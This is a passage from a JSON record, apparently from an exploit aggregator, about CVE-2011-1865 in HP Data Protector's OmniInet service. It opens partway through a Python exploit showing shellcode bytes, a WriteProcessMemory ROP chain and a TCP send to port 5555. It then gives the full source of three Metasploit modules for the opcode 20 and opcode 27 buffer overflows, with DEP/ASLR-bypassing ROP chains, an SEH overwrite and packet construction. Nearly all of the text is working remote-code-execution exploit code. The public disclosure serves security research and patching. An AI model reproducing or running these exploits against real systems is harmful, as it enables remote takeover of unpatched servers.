\\xbf\\x41\\xfa\\xe6\\xa0\\x69\\xd0\\x91\\xe6\\xa7\\x00\\xf2\"\r\n\"\\x80\\xc5\\xb6\\xe5\\x0c\\x43\\x50\\x6f\\xbd\\x05\\xca\\x07\\x7f\\x72\\xc3\"\r\n\"\\xb0\\x80\\x50\\x7f\\x69\\x17\\xec\\x69\\xad\\x18\\xed\\xbf\\x9e\\xb5\\x45\"\r\n\"\\x28\\x54\\xd6\\x51\\x49\\x6b\\xf3\\xf1\\x00\\x54\\x94\\x88\\x7c\\x17\\x04\"\r\n\"\\x8c\\x54\\xcf\\xa5\\x1f\\x33\\x0f\\xa3\\x03\\xec\\x58\\xe4\\xf2\\xe5\\x0c\"\r\n\"\\x18\\xac\\x5f\\x32\\xe1\\x28\\xa7\\xf6\\x3e\\x89\\x26\\xf7\\xb3\\xb5\\x0c\"\r\n\"\\xe7\\x0d\\x35\\x09\\x53\\xc2\\x60\\xc7\\x0d\\xa4\\xda\\xa9\\xe7\\x7e\\xb0\"\r\n\"\\x63\\x6f\\x06\\xfa\\xb3\\xe9\\x07\\xd7\\x45\\x15\\xb9\\x8e\\x13\\x2a\\x76\"\r\n\"\\x47\\x94\\x53\\x6a\\xf7\\x5b\\x8e\\x2e\\x07\\x16\\x92\\x07\\x80\\xff\\x47\"\r\n\"\\x1a\\xcd\\xff\\xb2\\x59\\xe8\\x83\\x36\\x22\\x0f\\x9b\\x33\\x27\\x4b\\x1b\"\r\n\"\\xa8\\x55\\xc4\\xce\\xce\\xca\\xe5\\xda\")\r\n\r\nwpm = \"\\x55\\x23\\xe4\\x77\" # 77E42355 WriteProcessMemory - Win2k3 \r\nwpm += \"\\x50\\xd0\\x4b\\x00\" # 004bd050 omniinet.exe - Return after WPM \r\nwpm += \"\\xff\\xff\\xff\\xff\" # hProcess \r\nwpm += \"\\x50\\xd0\\x4b\\x00\" # 004bd050 omniinet.exe - Address to Patch \r\nwpm += \"\\x41\\x41\\x41\\x41\" # lpBuffer placeholder (Shellcode Address) \r\nwpm += \"\\x42\\x42\\x42\\x42\" # nSize placeholder (Shellcode Size) 00001000\r\nwpm += \"\\x38\\xd4\\x4b\\x00\" # 004BD438 omniinet.exe - Pointer for Written Bytes \r\n\r\n# pre\r\npacket = (\"\\x00\\x00\\x27\\xCA\\xFF\\xFE\\x32\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\")\r\n\r\n# padding to EIP\r\npacket +=\"A\"* 2004\r\n# Get a copy of ESP into a 
register for safekeeping\r\npacket +=\"\\x1f\\x59\\x37\\x7c\" # 0x7c37591f PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN\r\npacket += \"\\x44\" * 4 # junk to pop into EBP\r\n\r\n# Jump over the WPM parameters\r\npacket += \"\\xfe\\x9b\\x35\\x7c\" # 0x7c359bfe : # ADD ESP,20 # RETN \r\npacket += wpm\r\npacket += \"\\x44\" * 4 # filler\r\n\r\n# Get EAX to point at our shellcode on the stack and overwrite the placeholder\r\npacket += \"\\x40\\xa0\\x35\\x7c\" # 0x7c35a040 : # MOV EAX,ECX # RETN \r\npacket += \"\\x1c\\x3b\\x37\\x7c\" # 0x7c373b1c : # ADD EAX,100 # POP EBP # RETN\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\xd4\\x3d\\x43\\x00\" # 0x00433dd4 : # MOV DWORD PTR DS:[ECX+18],EAX # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\n\r\n# Craft the shellcode size in EAX and overwrite the placeholder\r\npacket += \"\\x2e\\x40\\x34\\x7c\" # 0x7c34402e : # POP EDX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x59\\x3d\\x41\\x41\" # Value to SUB from EAX \r\npacket += \"\\x23\\x62\\x37\\x7c\" # 0x7c376223 : # POP EAX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x41\\x41\\x41\\x41\" # To be the sub-ee 41413D59\r\npacket += \"\\xe9\\xfa\\x36\\x7c\" # 0x7c36fae9 : # SUB EAX,EDX # POP ESI # RETN ** [MSVCR71.dll]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x69\\x60\\x37\\x7c\" # 0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x44\" * 12 # filler\r\n\r\n# Point ESP to WPM and the stack and return\r\npacket += \"\\x40\\xa0\\x35\\x7c\" # 0x7c35a040 : # MOV EAX,ECX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP 
EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x05\\x8b\\x34\\x7c\" # 0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll]\r\npacket += \"\\x45\" * 8\r\npacket +=\"\\x90\" *120\r\npacket += shellcode\r\npacket +=\"C\"* 980000\r\n# post\r\npacket +=(\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\")\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\nsock.close()\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17468/"}, {"lastseen": "2016-02-02T07:58:21", "description": "HP OmniInet.exe Opcode 20 Buffer Overflow. CVE-2011-1865. Remote exploit for windows platform", "published": "2011-07-04T00:00:00", "type": "exploitdb", "title": "HP OmniInet.exe Opcode 20 - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-04T00:00:00", "id": "EDB-ID:17490", "href": "https://www.exploit-db.com/exploits/17490/", "sourceData": "##\r\n# $Id: hp_omniinet_4.rb 13096 2011-07-04 22:33:47Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"HP OmniInet.exe Opcode 20 Buffer Overflow\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in HP Data Protector's OmniInet\r\n\t\t\t\tprocess. By supplying a long string of data as the file path with opcode '20',\r\n\t\t\t\ta buffer overflow can occur when this data is being written on the stack where\r\n\t\t\t\tno proper bounds checking is done beforehand, which results arbitrary code\r\n\t\t\t\texecution under the context of SYSTEM. This module is also made against systems\r\n\t\t\t\tsuch as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\r\n\t\t\t\tenabled by default.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => \"$Revision: 13096 $\",\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Oren Isacson', #Initial discovery, poc\r\n\t\t\t\t\t'muts', #Initial poc of the ROP exploit w/ dookie\r\n\t\t\t\t\t'dookie', #Initial poc of the ROP exploit w/ muts\r\n\t\t\t\t\t'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD)\r\n\t\t\t\t\t'corelanc0d3r', #MSF module with sinn3r\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-1865' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/17468/' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\r\n\t\t\t\t\t[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'PrependEncoder' => \"\\x66\\x81\\xc4\\xb8\\x0b\\x61\\x9d\", #add sp, 0xb88; 
popad; popfd\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"process\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t#If 'Max' gets too long (ie. 10000 bytes), we can get a busted heap\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on XP SP3 or Win Server 2003',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 2005, #For overwriting a RETN (6481 for SEH)\r\n\t\t\t\t\t\t\t'Ret' => 0x7C342629, #RETN - MSVCR71.dll\r\n\t\t\t\t\t\t\t'Max' => 5000,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on Win Server 2008',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1993, #For overwriting a RETN (6481 for SEH)\r\n\t\t\t\t\t\t\t'Ret' => 0x7C342629, #RETN - MSVCR71.dll\r\n\t\t\t\t\t\t\t'Max' => 5000,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Jun 29 2011\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options([Opt::RPORT(5555)], self.class)\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"L\")[0].to_i\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t#mona.py tekniq\r\n\t\t#https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/\r\n\t\trop = [\r\n\t\t\t#Initial setup\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t#ROP begins here\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c37a140, # Make EAX readable\r\n\t\t\t0x7c37591f, # PUSH ESP # ... 
# POP ECX # POP EBP # RETN (MSVCR71.dll)\r\n\t\t\tnop, # EBP\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c37a140, # <- VirtualProtect() found in IAT\r\n\t\t\t0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)\r\n\t\t\t0x7c346c0b, # Slide, so next gadget would write to correct stack location\r\n\t\t\t0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)\r\n\t\t\tnop, # EDI (filler)\r\n\t\t\tnop, # will be patched at runtime (VP), then picked up into ESI\r\n\t\t\tnop, # EBX (filler)\r\n\t\t\t0x7c376402, # POP EBP # RETN (msvcr71.dll)\r\n\t\t\t0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0xfffff82f, # size 20001 bytes\r\n\t\t\t0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c354901, # POP EBX # RETN (MSVCR71.dll)\r\n\t\t\t0xffffffff, # pop value into ebx\r\n\t\t\t0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)\r\n\t\t\t0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c34d201, # POP ECX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)\r\n\t\t\t0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)\r\n\t\t\t0x7c34b8d8, # ROP NOP (-> edi)\r\n\t\t\t0x7c344f87, # POP EDX # RETN (MSVCR71.dll)\r\n\t\t\t0xffffffc0, # value to negate, target value : 0x00000040, target: edx\r\n\t\t\t0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x90909090, # NOPS (-> eax)\r\n\t\t\t0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)\r\n\t\t].pack('V*')\r\n\r\n\t\t#Overflowing path \"C:\\Program Files\\OmniBack\\bin\\\"\r\n\t\t#4807 bytes after target.ret, but we need to use less than that to avoid a busted heap\r\n\t\tsploit = ''\r\n\t\tsploit << rand_text_alpha(target['Offset']-sploit.length)\r\n\t\tsploit << [target.ret].pack('V*')\r\n\t\tsploit << rop\r\n\t\tsploit << payload.encoded\r\n\t\tsploit << 
rand_text_alpha(target['Max']-sploit.length)\r\n\r\n\t\tpkt = ''\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpkt << \"\\x41\\x41\" #Length field place holder\r\n\t\tpkt << \"\\xff\\xfe\"\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x32\\x00\")\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 5)\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x20\")\r\n\t\tpkt << Rex::Text.to_unicode(\"20\") #Opcode\r\n\t\tpkt << \"\\x00\"\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 7)\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x20\\x00\")\r\n\t\tpkt << sploit\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 16)\r\n\r\n\t\t#pkt length\r\n\t\tpkt[2,2] = [pkt.length-5].pack('n')\r\n\r\n\t\tprint_status(\"Sending packet to #{datastore['RHOST']}...\")\r\n\t\tsock.put(pkt)\r\n\r\n\t\t#Data Protector lags before triggering the vuln code\r\n\t\t#Long delay seems necessary to ensure we get a shell back\r\n\t\tselect(nil,nil,nil,20)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17490/"}], "metasploit": [{"lastseen": "2020-10-06T00:46:30", "description": "This module exploits a vulnerability found in HP Data Protector's OmniInet process. By supplying a long string of data as the file path with opcode '20', a buffer overflow can occur when this data is being written on the stack where no proper bounds checking is done beforehand, which results arbitrary code execution under the context of SYSTEM. 
This module is also made against systems such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR enabled by default.\n", "published": "2011-07-04T17:02:40", "type": "metasploit", "title": "HP OmniInet.exe Opcode 20 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_4", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"HP OmniInet.exe Opcode 20 Buffer Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability found in HP Data Protector's OmniInet\n process. By supplying a long string of data as the file path with opcode '20',\n a buffer overflow can occur when this data is being written on the stack where\n no proper bounds checking is done beforehand, which results arbitrary code\n execution under the context of SYSTEM. 
This module is also made against systems\n such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n enabled by default.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Oren Isacson', #Initial discovery, poc\n 'muts', #Initial poc of the ROP exploit w/ dookie (WPM())\n 'dookie', #Initial poc of the ROP exploit w/ muts (WPM())\n 'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD)\n 'corelanc0d3r <peter.ve[at]corelan.be>', #MSF module with sinn3r, VP() ROP Chain\n ],\n 'References' =>\n [\n [ 'CVE', '2011-1865' ],\n [ 'OSVDB', '73571'],\n [ 'EDB', '17468' ],\n [ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ],\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x66\\x81\\xc4\\xb8\\x0b\\x61\\x9d\", #add sp, 0xb88; popad; popfd\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"process\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n #If 'Max' gets too long (ie. 10000 bytes), we can get a busted heap\n [\n 'HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008',\n {\n 'Offset' => 1993, #For overwriting a RETN (6481 for SEH)\n 'Ret' => 0x7C342629, #RETN - MSVCR71.dll\n 'Max' => 5000,\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 29 2011\",\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def nop\n return make_nops(4).unpack(\"L\")[0].to_i\n end\n\n def exploit\n\n connect\n\n #mona.py tekniq\n #https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/\n rop = [\n #Initial setup - ROP Flight Landing Strip\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n #ROP begins here\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x7c37a140, # Make EAX readable\n 0x7c37591f, # PUSH ESP # ... 
# POP ECX # POP EBP # RETN (MSVCR71.dll)\n nop, # EBP\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x7c37a140, # <- VirtualProtect() found in IAT\n 0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)\n 0x7c346c0b, # Slide, so next gadget would write to correct stack location\n 0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)\n nop, # EDI (filler)\n nop, # will be patched at runtime (VP), then picked up into ESI\n nop, # EBX (filler)\n 0x7c376402, # POP EBP # RETN (msvcr71.dll)\n 0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0xfffff82f, # size 20001 bytes\n 0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)\n 0x7c354901, # POP EBX # RETN (MSVCR71.dll)\n 0xffffffff, # pop value into ebx\n 0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)\n 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)\n 0x7c34d201, # POP ECX # RETN (MSVCR71.dll)\n 0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)\n 0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)\n 0x7c34b8d8, # ROP NOP (-> edi)\n 0x7c344f87, # POP EDX # RETN (MSVCR71.dll)\n 0xffffffc0, # value to negate, target value : 0x00000040, target: edx\n 0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x90909090, # NOPS (-> eax)\n 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)\n ].pack('V*')\n\n #Overflowing path \"C:\\Program Files\\OmniBack\\bin\\\"\n #4807 bytes after target.ret, but we need to use less than that to avoid a busted heap\n sploit = ''\n sploit << rand_text_alpha(target['Offset']-sploit.length)\n sploit << [target.ret].pack('V*')\n sploit << rop\n sploit << payload.encoded\n sploit << rand_text_alpha(target['Max']-sploit.length)\n\n pkt = ''\n pkt << Rex::Text.to_unicode(\"\\x00\")\n pkt << \"\\x41\\x41\" #Length field place holder\n pkt << \"\\xff\\xfe\"\n pkt << Rex::Text.to_unicode(\"\\x32\\x00\")\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 5)\n pkt << 
Rex::Text.to_unicode(\"\\x20\")\n pkt << Rex::Text.to_unicode(\"20\") #Opcode\n pkt << \"\\x00\"\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 7)\n pkt << Rex::Text.to_unicode(\"\\x20\\x00\")\n pkt << sploit\n pkt << Rex::Text.to_unicode(\"\\x00\")\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 16)\n\n #pkt length\n pkt[2,2] = [pkt.length-5].pack('n')\n\n print_status(\"Sending packet to #{datastore['RHOST']}...\")\n sock.put(pkt)\n\n #Data Protector lags before triggering the vuln code\n #Long delay seems necessary to ensure we get a shell back\n select(nil,nil,nil,20)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_4.rb"}, {"lastseen": "2020-08-27T01:01:45", "description": "This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code.\n", "published": "2011-07-01T17:07:38", "type": "metasploit", "title": "HP OmniInet.exe Opcode 27 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2017-09-14T02:03:34", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_3", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the Hewlett-Packard\n OmniInet NT Service. 
By sending a specially crafted opcode 27 packet,\n a remote attacker may be able to execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-1865' ],\n [ 'OSVDB', '73571'],\n [ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',\n {\n #POP/POP/RET from OmniBack\\bin\\MSVCR71.dll\n 'Ret' => 0x7c35630d\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 29 2011'))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def check\n\n connect\n sock.put(rand_text_alpha_upper(64))\n resp = sock.get_once(-1,5)\n disconnect\n\n if (resp)\n resp = resp.unpack('v*').pack('C*')\n print_status(\"Received response: \" + resp)\n\n # extract version\n if (resp =~ /HP Data Protector/)\n version = resp.split[3]\n elsif (resp =~ /HP OpenView Storage Data Protector/)\n version = resp.split[5]\n elsif (resp =~ /HP StorageWorks Application Recovery Manager/)\n version = resp.split[5]\n else\n return Exploit::CheckCode::Detected\n end\n\n version = version.split('.')\n major = version[1].to_i\n minor = version[2].to_i\n if ((major < 6) or (major == 6 and minor < 11))\n return Exploit::CheckCode::Appears\n end\n\n if ((major > 6) or (major == 6 and minor >= 11))\n return Exploit::CheckCode::Safe\n end\n\n end\n return Exploit::CheckCode::Safe\n\n end\n\n def exploit\n\n connect\n\n trigger = rand_text_alpha_upper(10000)\n trigger[4552, payload.encoded.length] = payload.encoded\n trigger[5352, 8] = generate_seh_record(target.ret)\n trigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-788\").encode_string\n\n opcode = \"27\"\n\n packet = Rex::Text.to_unicode(\"\\x00\")\n packet << 
\"\\x27\\xca\" #length\n packet << \"\\xff\\xfe\\x32\"\n packet << \"\\x00\\x00\\x00\"\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 3\n packet << Rex::Text.to_unicode(\"\\x20\")\n packet << trigger\n packet << Rex::Text.to_unicode(\"\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\" + opcode + \"\\x00\")\n packet << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 24\n\n print_status(\"Trying #{target.name}...\")\n sock.put(packet)\n\n select(nil,nil,nil,10)\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/hp_omniinet_3.rb"}]}